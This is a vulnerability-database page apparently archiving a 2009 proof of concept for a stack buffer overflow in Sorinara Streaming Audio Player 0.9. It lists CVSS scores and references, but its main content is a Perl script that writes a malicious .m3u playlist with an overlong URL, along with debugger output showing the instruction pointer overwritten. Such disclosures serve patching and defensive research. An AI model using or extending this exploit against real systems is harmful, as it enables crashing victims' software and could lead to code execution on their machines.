Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow PoC

2009-07-22 / 2009-07-23
Credit: Cyber-Zone
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # # # Found By : Cyber-Zone (ABDELKHALEK) # # # Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS # # FIGUIG OwnZ !!! # # Streaming Audio Player 0.9 (.M3U File) Local Buffer Overflow PoC # #Olly Registers #EAX 00197D20 #ECX 0000020E #EDX 00126F84 #EBX 00193DAF #ESP 001270B8 #EBP 7C81391C kernel32.GetFullPathNameA #ESI 00197D20 #EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA #EIP 41414141 # my $Header = "#EXTM3U\n"; my $ex="http://"."A" x 509; open(MYFILE,'>>buffer.m3u'); print MYFILE $Header.$ex; close(MYFILE);

References:

http://xforce.iss.net/xforce/xfdb/50339
http://www.securityfocus.com/bid/34842
http://www.milw0rm.com/exploits/8620
http://www.milw0rm.com/exploits/8617


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top